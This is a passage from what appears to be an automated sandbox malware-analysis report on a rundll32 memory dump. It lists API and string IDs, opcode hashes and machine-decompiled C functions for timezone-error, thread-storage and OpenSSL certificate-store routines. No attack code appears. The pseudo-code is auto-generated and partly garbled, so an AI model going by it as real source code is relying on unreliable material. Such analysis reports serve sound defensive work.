                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertOpenStore
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Opening certificate store %s
                                        • API String ID: 1485946479-1252851234
                                        • Opcode ID: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction ID: d2755260a1ae89a0dc4ed5baa078d38c0fffb7e8788573b233f18a154f235882
                                        • Opcode Fuzzy Hash: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction Fuzzy Hash: C0118EB234068086FB50DF15E804BC973A2FB48B84F58E12799684B765EB3DCB548B02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 56%
                                        			E000001C31C3386F4140(void* __rax) {
                                        				char _v80;
                                        				char _v168;
                                        				long long _v176;
                                        				char _v184;
                                        				char _v192;
                                        				long long _v200;
                                        				char _v208;
                                        				char _v216;
                                        				void* _t20;
                                        				void* _t21;
                                        				void* _t22;
                                        				void* _t23;
                                        				void* _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				void* _t32;
                                        				void* _t41;
                                        				void* _t42;
                                        				void* _t43;
                                        
                                        				_t27 = __rax;
                                        				_v176 = 0xfffffffe;
                                        				E000001C31C3388122E0(_t21, _t22, _t23, _t24, __rax, _t31, _t32, _t42, _t43);
                                        				if (_t27 != 0) goto 0x386f41d1;
                                        				_v216 = 0x3889d200;
                                        				_v208 = 0x3889d200;
                                        				_v200 = 0x3889d200;
                                        				_v192 = "could not convert calendar time to UTC time";
                                        				_v184 = 1;
                                        				E000001C31C33880E0E4(_t31,  &_v192,  &_v208, _t41, _t42);
                                        				_v216 = 0x3889d2a0;
                                        				E000001C31C3386FE670(_t31,  &_v80,  &_v216);
                                        				E000001C31C3386FE710(_t20, _t31,  &_v168, 0x3889d2a0, _t42);
                                        				return E000001C31C3388103EC(_t31,  &_v168, 0x388e4ab0, _t42);
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: could not convert calendar time to UTC time
                                        • API String ID: 3608347590-2088861013
                                        • Opcode ID: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction ID: 84654ae148a74902057b318b1f956643c038d41537ed96526f6dafb75c7d4cac
                                        • Opcode Fuzzy Hash: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction Fuzzy Hash: CC012D32259BC195FA60DB10E4407DAB3A4F785364F80A326E6BD46AA9EF6CC349C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E000001C31C338701E80(long long __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				long _t10;
                                        				void* _t13;
                                        				long _t14;
                                        				long long _t18;
                                        				void* _t22;
                                        				void* _t24;
                                        
                                        				_t18 = __rax;
                                        				_v40 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_v32 = 0x3890b688;
                                        				_t10 = TlsAlloc();
                                        				if (_t10 != 0xffffffff) goto 0x38701ede;
                                        				_t14 = GetLastError();
                                        				E000001C31C33880D880(_t22, _t24);
                                        				_v24 = _t14;
                                        				_v16 = _t18;
                                        				if (_t14 == 0) goto 0x38701ede;
                                        				_t13 = E000001C31C3386EE680("tss");
                                        				asm("int3");
                                        				 *0x3890b688 = _t10;
                                        				return _t13;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocErrorExceptionInit_thread_footerLastThrow__std_exception_copy
                                        • String ID: tss
                                        • API String ID: 1176384431-1638339373
                                        • Opcode ID: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction ID: d377e489739e1d0e39c275e265cfd38f1c2bd8cbf16cdf6b5f96795e249f7172
                                        • Opcode Fuzzy Hash: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction Fuzzy Hash: 15F04F72644BC082F6109F65B884989A360F7847B4F549316FAB547BE8DB78C6558B01
                                        Uniqueness

                                        Uniqueness Score: -1.00%